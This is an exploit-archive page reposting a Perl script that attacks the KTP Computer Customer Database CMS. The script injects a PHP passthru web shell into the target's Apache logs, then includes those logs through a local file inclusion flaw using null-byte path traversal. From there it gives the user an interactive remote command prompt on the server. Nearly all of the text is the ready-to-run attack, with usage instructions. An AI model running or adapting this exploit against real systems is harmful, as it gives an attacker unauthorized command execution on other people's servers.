首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KTP Computer Customer Database CMS Local File Inclusion Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2008-12-01  
#!/usr/bin/perl -w
#======================================
# KTPCCD Local File Inclusion Exploit
#======================================
#
#  ,--^----------,--------,-----,-------^--,
#  |  |||||||||   `--------'    |	   O	  .. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#   `\_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `\   /
#    / XXXXXX /\______(
#   / XXXXXX /           
#  / XXXXXX /
# (________(             
#  `------'
#
#AUTHOR : CWH Underground
#DATE : 30 November 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : KTP Computer Customer Database CMS
#VERSION : 1
#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip
######################################################
#Note: magic_quotes_gpc = off
#Vulnerability in Local File Inclusion
#Wrote Exploit for Local File Inclusion <-> Remote Command Execution
#######################################################################################
#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us,
#######################################################################################


use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;

$log="../";
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }

print "\n==============================================\n";
print "     KTP Computer Customer Database \n";
print "    Remote Command Execution Exploit \n";
print "      Discovered By CWH Underground \n";
print "==============================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
print " \n";



if (@ARGV < 2)
{
    print "Usage: ./xpl.pl <Host> <Path>\n";
	print "Ex. ./xpl.pl www.hackme.com /ktp\n";

}

$host=$ARGV[0];
$path=$ARGV[1];


if ( $host   =~   /^http:/ ) {$host =~ s/http:\/\///g;}

print "\nTrying to Inject the Code...\n";

$CODE="<? passthru(\$_GET[cmd]) ?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
print $socket "GET /cwhunderground ".$CODE." HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);

if ( $host   !~   /^http:/ ) {$host = "http://" . $host;}

 foreach $getlog(@apache)
                {
                  chomp($getlog);
				  $find= $host.$path."/?p=".$getlog."%00";
                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
				  $req = HTTP::Request->new(GET => $find);
				  $res = $xpl->request($req);
				  $info = $res->content;
                  if($info =~ /cwhunderground/)
                    {print "\nSuccessfully injected in $getlog \n";$log=$getlog;}
                }


my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }

chomp( $cmd = <STDIN> );

while($cmd !~ "exit") {   
   
				  $shell= $host.$path."/?p=".$log."%00&cmd=$cmd";
                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
				  $req = HTTP::Request->new(GET => $shell);
				  $res = $xpl->request($req);
				  $info = $res->content;
				  print "\n$info";

   
    my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }
    chomp( $cmd = <STDIN> );   
}

# [2008-11-30]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Quick Tree View .NET 3.1 (qtv.
·KTP Computer Customer Database
·Active Business Directory v 2
·Minimal Ablog 0.4 (SQL/FU/Bypa
·Active Time Billing 3.2 (Auth
·Electronics Workbench (EWB Fil
·Active Price Comparison v 4 (P
·cpCommerce 1.2.6 (URL Rewrite)
·Active Photo Gallery 6.2 (Auth
·Active Web Helpdesk v 2 (Categ
·Cain & Abel <= v4.9.24 .RDP St
·Cain & Abel 4.9.23 (rdp file)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved